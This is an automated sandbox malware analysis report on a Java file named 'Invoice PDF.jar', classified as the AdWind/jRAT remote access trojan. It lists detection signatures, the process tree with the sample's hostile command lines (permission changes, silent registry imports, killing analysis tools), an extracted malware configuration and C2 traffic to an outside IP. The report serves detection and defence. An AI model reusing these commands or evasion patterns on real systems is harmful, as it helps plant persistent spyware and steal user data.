Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Invoice PDF.jar

Overview

General Information

Sample Name:Invoice PDF.jar
Analysis ID:392877
MD5:903b63e35bf8738809eab0f187027daf
SHA1:257ff2ca9d7848e7c411790c3fa88a0aea479079
SHA256:bdfe705deebedf2b4edd1fee5bb225f3a14718f0a1007553fec5050db0f7fe08
Tags:Adwindjar
Infos:

Most interesting Screenshot:

Detection

ADWIND
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected ADWIND Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AdWind RAT
Yara detected AdWind RATs dll
Exploit detected, runtime environment starts unknown processes
Java source code contains strings found in CrossRAT
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses regedit.exe to modify the Windows registry
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Conhost Parent Process Executions
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

Startup

  • System is w10x64
  • cmd.exe (PID: 6840 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Invoice PDF.jar'' >> C:\cmdlinestart.log 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • conhost.exe (PID: 4740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • java.exe (PID: 6892 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Invoice PDF.jar' MD5: 28733BA8C383E865338638DF5196E6FE)
      • icacls.exe (PID: 6968 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • wscript.exe (PID: 6992 cmdline: wscript C:\Users\user\bgddtomvyl.js MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • regedit.exe (PID: 7120 cmdline: 'regedit.exe' 'C:\Users\user\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg' MD5: 617538C965AC4DDC72F9CF647C4343D5)
        • javaw.exe (PID: 1540 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\jhxromh.txt' MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
          • java.exe (PID: 4596 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class MD5: 28733BA8C383E865338638DF5196E6FE)
            • conhost.exe (PID: 4512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • cmd.exe (PID: 6236 cmdline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 6320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • cscript.exe (PID: 6500 cmdline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
            • cmd.exe (PID: 6912 cmdline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • cscript.exe (PID: 6980 cmdline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
            • cmd.exe (PID: 4524 cmdline: cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 4272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6132 cmdline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • cscript.exe (PID: 4248 cmdline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 724 cmdline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • cscript.exe (PID: 6776 cmdline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • xcopy.exe (PID: 6848 cmdline: xcopy 'C:\Program Files (x86)\Java\jre1.8.0_211' 'C:\Users\user\AppData\Roaming\Oracle\' /e MD5: 9F3712DDC0D7FE3D75B8A06C6EE8E68C)
          • cmd.exe (PID: 6376 cmdline: cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • taskkill.exe (PID: 6664 cmdline: taskkill /IM ProcessHacker.exe /T /F MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
          • cmd.exe (PID: 2032 cmdline: cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\GYcBDbnJPA3276512531836276281.reg MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Configuration

Threatname: AdWind

{"NETWORK": [{"PORT": 7777, "DNS": "127.0.0.1"}], "INSTALL": false, "MODULE_PATH": "zS/lq/BTk.GI", "PLUGIN_FOLDER": "DdWDtpinxpf", "JRE_FOLDER": "HSIROD", "JAR_FOLDER": "fUTkALeaTxM", "JAR_EXTENSION": "Vybgol", "ENCRYPT_KEY": "cPFjgddXIBcXBCIseEuXTZjwi", "DELAY_INSTALL": 2, "NICKNAME": "User", "VMWARE": false, "PLUGIN_EXTENSION": "DhjWU", "WEBSITE_PROJECT": "https://jrat.io", "JAR_NAME": "uiylKSALYJr", "JAR_REGISTRY": "WLyQyhWoosi", "DELAY_CONNECT": 2, "VBOX": false}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dllJoeSecurity_AdWind_dllYara detected AdWind RAT\'s dllJoe Security
    C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.classMAL_JRAT_Oct18_1Detects JRAT malwareFlorian Roth
    • 0x36507:$x1: /JRat.class
    • 0x3af09:$x1: /JRat.class
    C:\Users\user\AppData\Roaming\jhxromh.txtMAL_JRAT_Oct18_1Detects JRAT malwareFlorian Roth
    • 0x37b4a:$x1: /JRat.class
    • 0x76554:$x1: /JRat.class

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: java.exe PID: 4596JoeSecurity_AdWindYara detected AdWind RATJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.2.java.exe.4881274.1.raw.unpackJoeSecurity_AdWind_dllYara detected AdWind RAT\'s dllJoe Security
        9.2.javaw.exe.740d0000.8.unpackJoeSecurity_AdWind_dllYara detected AdWind RAT\'s dllJoe Security

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Conhost Parent Process ExecutionsShow sources
          Source: Process startedAuthor: omkar72: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 6848, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 4740

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbsAvira: detection malicious, Label: VBS/Agent.276
          Source: C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dllAvira: detection malicious, Label: TR/Spy.Agent.lusda
          Source: C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbsAvira: detection malicious, Label: VBS/Agent.276
          Source: C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbsAvira: detection malicious, Label: VBS/Agent.281
          Source: C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbsAvira: detection malicious, Label: VBS/Agent.281
          Source: C:\Users\user\AppData\Local\Temp\Windows9046764930049020633.dllAvira: detection malicious, Label: TR/Spy.Agent.3850
          Found malware configurationShow sources
          Source: java.exe.4596.10.memstrMalware Configuration Extractor: AdWind {"NETWORK": [{"PORT": 7777, "DNS": "127.0.0.1"}], "INSTALL": false, "MODULE_PATH": "zS/lq/BTk.GI", "PLUGIN_FOLDER": "DdWDtpinxpf", "JRE_FOLDER": "HSIROD", "JAR_FOLDER": "fUTkALeaTxM", "JAR_EXTENSION": "Vybgol", "ENCRYPT_KEY": "cPFjgddXIBcXBCIseEuXTZjwi", "DELAY_INSTALL": 2, "NICKNAME": "User", "VMWARE": false, "PLUGIN_EXTENSION": "DhjWU", "WEBSITE_PROJECT": "https://jrat.io", "JAR_NAME": "uiylKSALYJr", "JAR_REGISTRY": "WLyQyhWoosi", "DELAY_CONNECT": 2, "VBOX": false}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dllMetadefender: Detection: 72%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dllReversingLabs: Detection: 74%
          Source: C:\Users\user\AppData\Local\Temp\Windows9046764930049020633.dllMetadefender: Detection: 46%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\Windows9046764930049020633.dllReversingLabs: Detection: 65%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Invoice PDF.jarVirustotal: Detection: 11%Perma Link
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\README.txt
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
          Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdb source: javaw.exe, 00000009.00000002.602787359.00000000702E6000.00000002.00020000.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb source: javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.590464923.0000000004881000.00000004.00000001.sdmp
          Source: Binary string: b.pxb.ppb.phb.pXb.pDb.p8b.p,b.p source: javaw.exe, 00000009.00000002.602797426.00000000702E9000.00000004.00020000.sdmp
          Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\x64\Release\CryptUtil.pdb source: javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: javaw.exe, 00000009.00000002.602787359.00000000702E6000.00000002.00020000.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp

          Software Vulnerabilities:

          barindex
          Exploit detected, runtime environment starts unknown processesShow sources
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\wscript.exe

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2020728 ET TROJAN Possible Adwind/jSocket SSL Cert (assylias.Inc) 107.175.101.209:7865 -> 192.168.2.6:49739
          Source: global trafficTCP traffic: 192.168.2.6:49739 -> 107.175.101.209:7865
          Source: Joe Sandbox ViewASN Name: NEXEONUS NEXEONUS
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: unknownTCP traffic detected without corresponding DNS query: 107.175.101.209
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/3
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/Ca
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/allow-java-encodings
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/allow-java-encodingsc
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/allow-java-encodingserRej9
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/continue-after-fatal-erroret
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/create-cdata-nodes3
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/create-cdata-nodes:
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/disallow-doctype-decl
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes3
          Source: javaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion#
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion9
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansionS
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace/
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations#2
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations#i
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations9
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotationsalS9
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsatedDat;
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationss
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/include-comments
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/include-comments0
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/internal/parser-settings
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/internal/parser-settings7
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicates
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesKR
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicateslder
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesp
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only/
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlye/
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/namespace-growth
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/namespace-growthS
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/namespace-growtha
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd:
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdSA
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdc
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdnt:
